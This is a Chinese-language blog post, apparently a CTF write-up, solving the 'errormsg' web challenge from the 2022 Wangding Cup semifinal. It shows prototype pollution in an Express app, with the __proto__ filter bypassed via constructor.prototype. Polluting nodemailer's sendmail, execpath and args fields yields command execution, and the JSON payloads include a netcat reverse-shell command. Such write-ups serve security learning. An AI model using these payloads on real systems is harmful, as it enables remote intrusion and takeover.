<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="aesm1p">



    <meta name="description" content="相逢意气为君饮">



<title>2022第三届网鼎杯线下半决赛 | aesm1p&#39;s blog</title>



    <link rel="icon" href="/a.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 6.3.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">aesm1p&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">aesm1p&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">2022第三届网鼎杯线下半决赛</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">aesm1p</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">May 14, 2023&nbsp;&nbsp;10:05:14</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>第一次参加网鼎杯线下赛，全是pwn题，就两道web，还没做出来，难受，还是要继续学习</p>
<h1 id="errormsg"><a href="#errormsg" class="headerlink" title="errormsg"></a>errormsg</h1><p>这个题目是AntCTF 8-bit pub的改版，还是自己太菜了，而且当时比赛环境还没网。</p>
<p>题目给出了源代码，一个ExpressJS的项目，主要就是注册，登录，主页访问功能，在home页面存在一个extend函数，存在原型链污染的问题</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">all</span>(<span class="string">&#x27;/home&#x27;</span>, utils.<span class="property">checkSignIn</span>, <span class="keyword">function</span>(<span class="params">req, res, next</span>) &#123;</span><br><span class="line">  <span class="keyword">var</span> userInfo = &#123;</span><br><span class="line">    <span class="string">&quot;username&quot;</span>: req.<span class="property">session</span>.<span class="property">userID</span>,</span><br><span class="line">    <span class="string">&quot;email&quot;</span>: req.<span class="property">session</span>.<span class="property">email</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span>(req.<span class="property">method</span> == <span class="string">&#x27;GET&#x27;</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> res.<span class="title function_">render</span>(<span class="string">&#x27;home&#x27;</span>, &#123;<span class="string">&quot;username&quot;</span>: req.<span class="property">session</span>.<span class="property">userID</span>, <span class="string">&quot;userInfo&quot;</span>: userInfo&#125;);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">if</span>(req.<span class="property">method</span> == <span class="string">&#x27;POST&#x27;</span>) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">      utils.<span class="title function_">extend</span>(userInfo, req.<span class="property">body</span>);</span><br><span class="line">      <span class="keyword">return</span> res.<span class="title function_">render</span>(<span class="string">&#x27;home&#x27;</span>, &#123;<span class="string">&quot;username&quot;</span>: req.<span class="property">session</span>.<span class="property">userID</span>, <span class="string">&quot;userInfo&quot;</span>: userInfo&#125;);</span><br><span class="line">    &#125;<span class="keyword">catch</span>(err) &#123;</span><br><span class="line">      <span class="variable language_">console</span>.<span class="title function_">log</span>(err.<span class="property">message</span>)</span><br><span class="line">      <span class="keyword">var</span> transporter = nodemailer.<span class="title function_">createTransport</span>(config);</span><br><span class="line">      transporter.<span class="title function_">sendMail</span>(&#123;</span><br><span class="line">        <span class="attr">from</span>: <span class="string">&#x27;admin@ctfer.com&#x27;</span>,</span><br><span class="line">        <span class="attr">to</span>: req.<span class="property">session</span>.<span class="property">email</span>,</span><br><span class="line">        <span class="attr">subject</span>: <span class="string">&#x27;Something went wrong.&#x27;</span>,</span><br><span class="line">        <span class="attr">text</span>: err.<span class="property">message</span></span><br><span class="line">      &#125;, <span class="keyword">function</span>(<span class="params">err, info</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span>(err) &#123;</span><br><span class="line">          <span class="keyword">return</span> <span class="variable language_">console</span>.<span class="title function_">log</span>(err);</span><br><span class="line">        &#125;</span><br><span class="line">        transporter.<span class="title function_">close</span>();</span><br><span class="line">      &#125;)</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  res.<span class="title function_">send</span>()</span><br><span class="line">  <span class="comment">//res.render(&#x27;index&#x27;, &#123; title: &#x27;Express&#x27; &#125;);</span></span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>跟进extend函数</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="title function_">extend</span>(<span class="params">target</span>) &#123;</span><br><span class="line">	<span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">1</span>; i &lt; <span class="variable language_">arguments</span>.<span class="property">length</span>; i++) &#123;</span><br><span class="line">		<span class="keyword">var</span> source = <span class="variable language_">arguments</span>[i];</span><br><span class="line">		<span class="keyword">for</span> (<span class="keyword">var</span> key <span class="keyword">in</span> source) &#123;</span><br><span class="line">			<span class="keyword">if</span> (key === <span class="string">&#x27;__proto__&#x27;</span>) &#123;</span><br><span class="line">				<span class="keyword">return</span>;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">if</span> (hasOwnProperty.<span class="title function_">call</span>(source, key)) &#123;</span><br><span class="line">				<span class="keyword">if</span> (key <span class="keyword">in</span> source &amp;&amp; key <span class="keyword">in</span> target) &#123;</span><br><span class="line">					<span class="title class_">Utils</span>.<span class="title function_">extend</span>(target[key], source[key])</span><br><span class="line">				&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">					target[key] = source[key]</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> target</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到该函数对属性进行了赋值，可以进行原型链污染，过滤了<code>__proto__</code>，可以使用<code>constructor.prototype</code>绕过。</p>
<p>那么可以原型链污染之后要如何利用呢，这里使用nodemailer来发送邮件，nodemailer框架在SendmailTransport.js中引入了child_process组件，有可能可以进行命令执行</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ...</span></span><br><span class="line"><span class="keyword">const</span> spawn = <span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).<span class="property">spawn</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// ...</span></span><br><span class="line"><span class="title function_">send</span>(<span class="params">mail, done</span>) &#123;</span><br><span class="line">	<span class="keyword">try</span> &#123;</span><br><span class="line">		sendmail = <span class="variable language_">this</span>.<span class="title function_">_spawn</span>(<span class="variable language_">this</span>.<span class="property">path</span>, args);</span><br><span class="line">	&#125; <span class="keyword">catch</span> (E) &#123;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里的path和args是通过构造函数中的options传入的</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">SendmailTransport</span> &#123;</span><br><span class="line">    <span class="title function_">constructor</span>(<span class="params">options</span>) &#123;</span><br><span class="line">        options = options || &#123;&#125;;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// use a reference to spawn for mocking purposes</span></span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">_spawn</span> = spawn;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">options</span> = options || &#123;&#125;;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">name</span> = <span class="string">&#x27;Sendmail&#x27;</span>;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">version</span> = packageData.<span class="property">version</span>;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">execpath</span>;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">path</span> = <span class="variable language_">this</span>.<span class="property">execpath</span> || <span class="string">&#x27;sendmail&#x27;</span>;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">args</span> = <span class="literal">false</span>;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">winbreak</span> = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (options) &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="keyword">typeof</span> options === <span class="string">&#x27;string&#x27;</span>) &#123;</span><br><span class="line">                <span class="variable language_">this</span>.<span class="property">path</span> = options;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">typeof</span> options === <span class="string">&#x27;object&#x27;</span>) &#123;</span><br><span class="line">                <span class="keyword">if</span> (options.<span class="property">path</span>) &#123;</span><br><span class="line">                    <span class="variable language_">this</span>.<span class="property">path</span> = options.<span class="property">path</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">if</span> (<span class="title class_">Array</span>.<span class="title function_">isArray</span>(options.<span class="property">args</span>)) &#123;</span><br><span class="line">                    <span class="variable language_">this</span>.<span class="property">args</span> = options.<span class="property">args</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="variable language_">this</span>.<span class="property">winbreak</span> = [<span class="string">&#x27;win&#x27;</span>, <span class="string">&#x27;windows&#x27;</span>, <span class="string">&#x27;dos&#x27;</span>, <span class="string">&#x27;\r\n&#x27;</span>].<span class="title function_">includes</span>((options.<span class="property">newline</span> || <span class="string">&#x27;&#x27;</span>).<span class="title function_">toString</span>().<span class="title function_">toLowerCase</span>());</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里我们可以通过原型链污染来控制这两个变量的值，总结一下利用过程：通过原型链污染控制这两个参数，然后调用<code>SendmailTransport.send()</code></p>
<p>那么如果是程序流程走到该函数呢？查看<code>nodemailer.createTransport()</code>的定义</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable language_">module</span>.<span class="property">exports</span>.<span class="property">createTransport</span> = <span class="keyword">function</span> (<span class="params">transporter, defaults</span>) &#123;</span><br><span class="line">	<span class="keyword">if</span> (options.<span class="property">pool</span>) &#123;</span><br><span class="line">            transporter = <span class="keyword">new</span> <span class="title class_">SMTPPool</span>(options);</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (options.<span class="property">sendmail</span>) &#123;</span><br><span class="line">            transporter = <span class="keyword">new</span> <span class="title class_">SendmailTransport</span>(options); <span class="comment">// 触发该语句即可</span></span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (options.<span class="property">streamTransport</span>) &#123;</span><br><span class="line">            transporter = <span class="keyword">new</span> <span class="title class_">StreamTransport</span>(options);</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (options.<span class="property">jsonTransport</span>) &#123;</span><br><span class="line">            transporter = <span class="keyword">new</span> <span class="title class_">JSON</span>Transport(options);</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (options.<span class="property">SES</span>) &#123;</span><br><span class="line">            transporter = <span class="keyword">new</span> <span class="title class_">SESTransport</span>(options);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            transporter = <span class="keyword">new</span> <span class="title class_">SMTPTransport</span>(options);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到这里我们只要使<code>options.sendmail</code>为true即可触发SendmailTransport实例，而home路由的异常处理代码中调用了<code>sendMail</code>函数，该函数会调用<code>send</code>函数</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">      utils.<span class="title function_">extend</span>(userInfo, req.<span class="property">body</span>);</span><br><span class="line">      <span class="keyword">return</span> res.<span class="title function_">render</span>(<span class="string">&#x27;home&#x27;</span>, &#123;<span class="string">&quot;username&quot;</span>: req.<span class="property">session</span>.<span class="property">userID</span>, <span class="string">&quot;userInfo&quot;</span>: userInfo&#125;);</span><br><span class="line">    &#125;<span class="keyword">catch</span>(err) &#123;</span><br><span class="line">      <span class="variable language_">console</span>.<span class="title function_">log</span>(err.<span class="property">message</span>)</span><br><span class="line">      <span class="keyword">var</span> transporter = nodemailer.<span class="title function_">createTransport</span>(config);</span><br><span class="line">      transporter.<span class="title function_">sendMail</span>(&#123;</span><br><span class="line">        <span class="attr">from</span>: <span class="string">&#x27;admin@ctfer.com&#x27;</span>,</span><br><span class="line">        <span class="attr">to</span>: req.<span class="property">session</span>.<span class="property">email</span>,</span><br><span class="line">        <span class="attr">subject</span>: <span class="string">&#x27;Something went wrong.&#x27;</span>,</span><br><span class="line">        <span class="attr">text</span>: err.<span class="property">message</span></span><br><span class="line">      &#125;, <span class="keyword">function</span>(<span class="params">err, info</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span>(err) &#123;</span><br><span class="line">          <span class="keyword">return</span> <span class="variable language_">console</span>.<span class="title function_">log</span>(err);</span><br><span class="line">        &#125;</span><br><span class="line">        transporter.<span class="title function_">close</span>();</span><br><span class="line">      &#125;)</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>所以，最终的利用思路为：</p>
<ol>
<li>污染sendmail，path，args参数为恶意参数</li>
<li>想办法触发代码异常使得代码能够进入到<code>catch</code>分支</li>
</ol>
<p>首先注册账号并登录，提交如下json请求</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">	<span class="attr">&quot;test&quot;</span><span class="punctuation">:</span><span class="string">&quot;test&quot;</span><span class="punctuation">,</span></span><br><span class="line">	<span class="attr">&quot;constructor&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span></span><br><span class="line">		<span class="attr">&quot;prototype&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span></span><br><span class="line">		<span class="attr">&quot;sendmail&quot;</span><span class="punctuation">:</span><span class="keyword">true</span><span class="punctuation">,</span></span><br><span class="line">		<span class="attr">&quot;path&quot;</span><span class="punctuation">:</span><span class="string">&quot;sh&quot;</span><span class="punctuation">,</span></span><br><span class="line">		<span class="attr">&quot;args&quot;</span><span class="punctuation">:</span><span class="punctuation">[</span></span><br><span class="line">				<span class="string">&quot;-c&quot;</span><span class="punctuation">,</span></span><br><span class="line">				<span class="string">&quot;nc ip port -e /bin/sh&quot;</span></span><br><span class="line">			<span class="punctuation">]</span></span><br><span class="line">		<span class="punctuation">&#125;</span></span><br><span class="line">	<span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2023/05/12/V6PO5hv8XzoI3jQ.png" alt="image.png"></p>
<p>接下来就是设法触发代码异常然后反弹shell，首先监听端口，然后这里我们只要提交一个与userInfo重合的字段即可触发异常</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">	<span class="attr">&quot;username&quot;</span><span class="punctuation">:</span><span class="string">&quot;admin&quot;</span><span class="punctuation">,</span></span><br><span class="line">	<span class="attr">&quot;password&quot;</span><span class="punctuation">:</span><span class="string">&quot;1132&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2023/05/12/osyfg38lTr1nRB5.png" alt="image.png"></p>
<p>不过执行之后却报错了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TwigException: Unable to find template file sh</span><br></pre></td></tr></table></figure>

<p>应该是我们原型链污染覆盖的变量导致了服务的异常，搜索一下这个报错信息<br>在<code>node_modules\twig\twig.js</code>文件中找到了该报错信息：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">params.<span class="property">path</span> = params.<span class="property">path</span> || location;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (params.<span class="property">async</span>) &#123;</span><br><span class="line">  fs.<span class="title function_">stat</span>(params.<span class="property">path</span>, <span class="keyword">function</span> (<span class="params">err, stats</span>) &#123;</span><br><span class="line">	<span class="keyword">if</span> (err || !stats.<span class="title function_">isFile</span>()) &#123;</span><br><span class="line">	  <span class="keyword">if</span> (<span class="keyword">typeof</span> errorCallback === <span class="string">&#x27;function&#x27;</span>) &#123;</span><br><span class="line">		<span class="title function_">errorCallback</span>(<span class="keyword">new</span> <span class="title class_">Twig</span>.<span class="title class_">Error</span>(<span class="string">&#x27;Unable to find template file &#x27;</span> + params.<span class="property">path</span>));</span><br><span class="line">	  &#125;</span><br><span class="line"></span><br><span class="line">	  <span class="keyword">return</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	fs.<span class="title function_">readFile</span>(params.<span class="property">path</span>, <span class="string">&#x27;utf8&#x27;</span>, loadTemplateFn);</span><br><span class="line">  &#125;); <span class="comment">// <span class="doctag">TODO:</span> return deferred promise</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到是因为我们污染的path变量导致了这里<code>params.path</code>的报错，所以上面的污染path变量的方法行不通，我们在查看下SendmailTransport类，找找其它变量：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// node_modules\nodemailer\lib\sendmail-transport\index.js</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">SendmailTransport</span> &#123;</span><br><span class="line">    <span class="title function_">constructor</span>(<span class="params">options</span>) &#123;</span><br><span class="line">        options = options || &#123;&#125;;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// use a reference to spawn for mocking purposes</span></span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">_spawn</span> = spawn;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">options</span> = options || &#123;&#125;;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">name</span> = <span class="string">&#x27;Sendmail&#x27;</span>;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">version</span> = packageData.<span class="property">version</span>;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">execpath</span>;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">path</span> = <span class="variable language_">this</span>.<span class="property">execpath</span> || <span class="string">&#x27;sendmail&#x27;</span>;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">args</span> = <span class="literal">false</span>;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">winbreak</span> = <span class="literal">false</span>;</span><br></pre></td></tr></table></figure>

<p>可以看到这里的<code>this.path</code>赋值也可以通过<code>this.execpath</code>来传递，那么我可以通过污染execpath来控制path的值，这样就可以防止污染到其它类里面的path变量，修改后的payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">	&quot;test&quot;:&quot;test&quot;,</span><br><span class="line">	&quot;constructor&quot;:&#123;</span><br><span class="line">		&quot;prototype&quot;:&#123;</span><br><span class="line">		&quot;sendmail&quot;:true,</span><br><span class="line">		&quot;execpath&quot;:&quot;sh&quot;,</span><br><span class="line">		&quot;args&quot;:[</span><br><span class="line">				&quot;-c&quot;,</span><br><span class="line">				&quot;nc ip port -e /bin/sh&quot;</span><br><span class="line">			]</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>重启服务然后再次重新发送payload，即可在远程vps上收到反弹的shell。</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>aesm1p</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://example.com/2023/05/14/wdb2022SemiFinal/">http://example.com/2023/05/14/wdb2022SemiFinal/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2022 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2023/05/29/dompdf/">结合ctf题目复现分析CVE-2022-41343</a>
            
            
            <a class="next" rel="next" href="/2023/03/11/hgame2023/">hgame2023部分题目</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© aesm1p | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>